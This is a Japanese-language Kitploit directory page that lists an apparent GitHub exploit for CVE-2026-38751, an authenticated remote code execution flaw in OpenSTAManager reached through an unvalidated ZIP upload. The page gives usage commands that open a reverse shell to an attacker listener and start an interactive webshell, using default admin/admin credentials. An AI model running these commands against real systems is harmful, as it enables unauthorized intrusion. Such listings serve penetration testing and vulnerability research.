Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-38751 — 認証済みのリモートコード実行エクスプロイト。OpenSTAManagerの検証されていないZIPアップロードを介して、リバースシェルと対話型ウェブシェル機能を提供し、認可されたペネトレーションテストを支援します。 | Kitploit
ツール/GitHubGitHub/why-shell/cve-2026-38751
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubwhy-shell/cve-2026-38751

CVE-2026-38751

認証済みのリモートコード実行エクスプロイト。OpenSTAManagerの検証されていないZIPアップロードを介して、リバースシェルと対話型ウェブシェル機能を提供し、認可されたペネトレーションテストを支援します。

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-38751 — OpenSTAManager モジュールアップロード RCE

モジュール更新エンドポイントでの未検証ZIPアップロードによる認証済みRCE。

影響を受けるバージョン: OpenSTAManager <= 2.10.x

必要条件

pip install requests

使用方法

root@kitploit:~
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444

# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive

参考文献

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

免責事項

許可されたペネトレーションテストおよび教育目的にのみご利用ください。

ツールをダウンロード